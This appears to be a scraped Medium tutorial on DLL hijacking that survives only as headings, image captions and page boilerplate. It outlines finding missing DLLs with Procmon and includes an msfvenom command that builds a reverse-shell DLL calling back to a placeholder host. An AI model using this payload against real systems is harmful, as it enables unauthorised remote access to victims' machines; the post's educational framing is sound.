DLL Hijacking Attack

So what is DLL?

DLL Hijacking

Types of DLL Hijacking attacks

Configure the filter in Procman which will filter all the process which have missing DLL’s
As we can see the Procman have filtered all the process of application which has failed to locate a DLL
icacls c:\PS
Command:msfvenom -p windows/shell_reverse_tcp lhost=<ip> lport=<listening port> -f dll -o <dll name>
The target application is running as a system
The generated Malicious DLL
The connection is created and can be used to perform malicious activity

How to safeguard the end system from DLL hijacking.

Reference:

Wanna connect:

--

--

--

Mr Akuma | cyber security enthusiast |Secuirty Noob

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Advanced Backgammon Hack Free Resources Generator

Surfshark VPN Beached After Losing Its Way

Cracking a $2 million crypto wallet

Top 5 New Open Source Security Vulnerabilities in May 2018

How to Do a WordPress Plugin and Theme Security Audit?

plugin and theme security audit

SMS = Security Mislaid Service

{UPDATE} Speed Basketball Hack Free Resources Generator

Upvote Surge on Product Hunt: 100% decentralized & secure P2P file sharing client

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akshay Jain

Akshay Jain

Mr Akuma | cyber security enthusiast |Secuirty Noob

More from Medium

Cloud Pub/Sub

DNS and Root Server

Ansible Role to Configure K8S Multi- Node Cluster over AWS Cloud

Session 2: Hacking Phases